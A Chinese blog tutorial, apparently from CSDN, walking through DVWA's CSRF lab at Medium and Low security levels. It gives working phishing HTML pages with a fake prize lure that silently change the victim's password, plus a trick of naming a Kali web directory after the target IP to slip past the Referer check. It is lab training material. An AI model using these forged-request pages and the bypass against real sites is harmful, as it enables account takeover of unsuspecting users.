DVWA-CSRF跨站请求伪造 Medium和Low级别

最新推荐文章于 2023-07-01 22:27:44 发布
最新推荐文章于 2023-07-01 22:27:44 发布
阅读量297 收藏 1
点赞数 1
分类专栏: Kali 渗透 Web 安全 文章标签: csrf 前端 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xmj818719/article/details/123163601
版权

1代码分析

 

过滤条件

if( stripos( $SERVER[ 'HTTP_REFERER' ] ,$SERVER[ 'SERVER_NAME' ]) !== false )

判断,$SERVER[ 'SERVER_NAME' ]在 $SERVER[ 'HTTP_REFERER' ] 中是否存在,寻找第一次出现的地址

$_SERVER[ ' SERVER_NAME' ] 网站的地址 192.168.0.9

$_SERVER[ 'HTTP_REFERER' ] 请求发起着地址 192.168.0.9(靶场地址)若从黑客构造的钓鱼网站跳转的,显示的是黑客攻击机的地址

2正常构造一个CSRF

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>恭喜你,获得100万大奖,点击领取....</title>
</head>
<body>
<a href='http://192.168.0.9/DVWA-master/vulnerabilities/csrf/? 
password_new=123456&password_conf=123456&Change=Change'>点击领取百万大奖</a>
</body>
</html>

WIN10-浏览器访问

 BP抓包查看原因

 推荐人不符合判断条件,请求被丢弃(在新版浏览器更新了策略,推荐人判断)

3手工增加策略构造攻击请求页面

<html>
<head>
 <!- 设置推荐人策略,防止提交的内容被降级->
<meta name="referrer"  content="no-referrer-when-downgrade">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>恭喜你,获得100万大奖,点击领取....</title>
</head>
<body>
<a href='http://192.168.0.9/DVWA-master/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change'  referrer="no-referrer-when-downgrade">点击这里领取百万大奖</a>
</body>
</html>

 可看到,伪造的请求并不符合代码中对 Referer 信息的过滤。在伪造的链接中找不到 $_SERVER[ 'SERVER_NAME' ] ,即找不到 192.168.0.9 这个 IP 地址。

4最后在Kali上通过修改网站结构目录构造192.168.0.9结构

┌──(root💀Tea)-[/var/www/html]

└─# mkdir 192.168.0.9

┌─(root💀Tea)-[/var/www/html/192.168.0.9]

└─# pwd /var/www/html/192.168.0.9

referer中已经有了绕过过滤的192.168.0.9,将创建的csrf.html写入目录

┌──(root💀Tea)-[/var/www/html]

└─# cp csrf.html 192.168.0.9/csrf.html

 

5成功修改密码

6.Low 

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>恭喜你,获得100万大奖,点击领取....</title>
</head>
<body>
<a href='http://192.168.0.9/DVWA-master/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change'>点击这里领取百万大奖</a>
</body>
</html>

WIN10点击钓鱼链接被直接修改密码

有帮助到你,就点歌赞吧~~ 

盐茶Tea
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA-master.zip
08-22
通过实践在DVWA上遇到的各种安全问题,你可以深入学习Web应用的安全防护,提升对常见攻击如SQL注入、XSS跨站脚本、CSRF跨站请求伪造等的理解。 **Web安全基础概念** 1. **SQL注入**:当应用程序使用用户输入的数据...
跨站攻击(XSS+CSRF).docx
最新发布
01-05
1. 对DVWA的Reflected和 Stored XSS模块进行LowMedium、High等级的攻击,理解不同等级的攻击方式和防护策略。 2. 了解Impossible等级的XSS攻击机制和防御方法。 3. 从攻击者和受害者角度理解CSRF攻击,实施Low、...
csrf漏洞浅谈
qq_46041723的博客
11-13 674
csrf漏洞浅谈前言csrf漏洞介绍什么是csrfcsrf怎样实现举个例子csrf漏洞攻击原理csrf攻击产生条件csrf攻击的常见方式GET型方式POST方式csrf漏洞检测csrf漏洞的防御前端防御后端防御DVWA靶场练习csrf攻击low难度使用短链接进行格式修改构造攻击页面medium难度high难度后记 前言 菜狗本人的手终于伸向了csrf漏洞攻击记录一下 csrf漏洞介绍 什么是csrf csrf全称Cross Site Request Forgery,翻译过来就是跨站请求伪造。是一种网络攻击
DVWA---跨站请求伪造CSRF
wyzhxhn的博客
11-23 889
CSRF
CSRF 伪造用户请求攻击
枫梓林のBlog
05-02 1033
CSRF 伪造用户请求攻击 文章目录CSRF 伪造用户请求攻击0x01 CSRF 原理1.CSRF 漏洞的定义2.XSS与 CSRF的区别3.CSRF 的简单理解4.CSRF 实验环境0x02 基于 DVWAlow 级别演示 CSRF 攻击1.查看源代码2.构造URL 链接3.验证CSRF 攻击4.构造恶意链接5.短链接介绍0x03 基于 DVWAMedium 级别演示 CSRF 攻击1.查看源代码并简单测试2.通过抓包修改密码和通过其他页面提交请求的区别2.1 抓取正常的 HTTP请求,修改密
dvwa无法修改更改等级问题
欢迎来到我的博客
03-22 545
在使用burp时出现两个等级 cookie="security=impossible; security=low… 原因:在多个浏览器登录了burp 解决:退出所有登录账号,删除浏览器缓存,重新登录,修改等级(需要等一段时间才能生效) 转载:https://blog.csdn.net/qq_34626094/article/details/113129346 ...
新手指南:DVWA级别教程之CSRF
g695144224的博客
08-09 2777
转自:http://www.freebuf.com/articles/web/118352.html DVWA简介DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。DVWA共有十个模块,分别是Brute
pikachu,dvwacsrf详细步骤
05-17
6. DVWACSRF漏洞级别:在DVWACSRF漏洞有不同的安全级别,如LowMedium。在Low级别,没有使用CSRF Token,因此可以直接构造链接进行攻击。而在Medium级别,虽然源代码仍未见Token,但可能有其他形式的防护...
DVWA靶场通关——CSRF攻击
p36273的博客
07-01 1313
DVWA靶场一共又三关,现在我们就来通关吧。使用工具:Burp Suite Professional抓包工具。
DVWA_暴力破解low等级攻略
Keiltest的博客
07-13 980
是一个与刚入门计算机的同伴互相探讨相互请教的资源
DVWA靶场之CSRF(跨站请求伪造)
m0_65712192的博客
11-12 1013
DVWA靶场之CSRF(跨站请求伪造)
CSRF跨站请求伪造 | 总结记录
m0_56691564的博客
11-08 665
定义:攻击者利用服务器对用户的信任,从而欺骗受害者去服务器上执行受害者不知情的请求。在csrf攻击场景攻击者会伪造一个请求,然后欺骗用户进行点击,用户一旦点击攻击也就完成了,当然有时候也不需要用户点击,访问页面的时候攻击以及达成了。
DVWA - CSRF (low, medium, high)
无节操
01-06 3396
low设置一下cookie的PHPSESSID和security即可跨站请求import requestsdef main(): url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php' headers = { 'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngk
DVWACSRF
RexHa的博客
09-30 7399
CSRF跨站请求伪造,通常攻击者会伪造一个场景(例如一条链接),来诱使用户点击,用户一旦点击,黑客的攻击目的也就达到了,他可以盗用你的身份,以你的名义发送恶意请求
Dvwa csrflowmedium、high级别漏洞实战
永不垂头的博客
08-11 5057
Dvwa csrf级别漏洞实战 Low 源代码如下: GLOBALS:引用全局作用域可用的全部变量。GLOBALS :引用全局作用域可用的全部变量。GLOBALS:引用全局作用域可用的全部变量。GLOBALS 这种全局变量用于在 PHP 脚本的任意位置访问全局变量(从函数或方法均可)。PHP 在名为 $GLOBALS[index] 的数组存储了所有全局变量。变量的名字就是数组的键。 从源代码可以看出这里只是对用户输入的两个密码进行判断,看是否相等。不相等就提示密码不匹配。 相等的话,查看
DVWACSRF攻击Low&medium&High)
liweibin812的博客
01-14 5153
CSRF,全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。在20...
DVWA-CSRF模块 包括代码审计
weixin_45715461的博客
06-01 431
DVWA-CSRF模块 包括代码审计
DVWA练习之CSRF
dz919908651的博客
08-22 2516
DVWA练习之CSRF 本博客将记录在web安全问题一种常见的漏洞——“CSRF”漏洞的实践演练。首先阐述CSRF漏洞的概念,原理,最后展示基于DVWA的各种等级的CSRFCSRF概念 CSRF(cross-site request forgery):跨站请求伪造漏洞。 概念:利用用户已登录的身份,在用户毫不知情的情况下,以用户的名义完成非法操作。 DVWA跨站请求...
DVWACSRF(跨站请求伪造攻击)
热门推荐
谢公子的博客
10-01 1万+
目录 Low Middle High Impossible Low 源代码: &lt;?php if( isset( $_GET[ 'Change' ] ) ) { // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ]; ...
dvwa跨站请求伪造 (csrf)
09-13
跨站请求伪造CSRF)是一种攻击方式,利用用户已经通过身份验证的会话执行非预期的操作。 在DVWACSRF可以被用作一种漏洞进行攻击攻击者可以通过在受害者浏览器注入恶意代码或链接,来诱使用户执行某些不...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值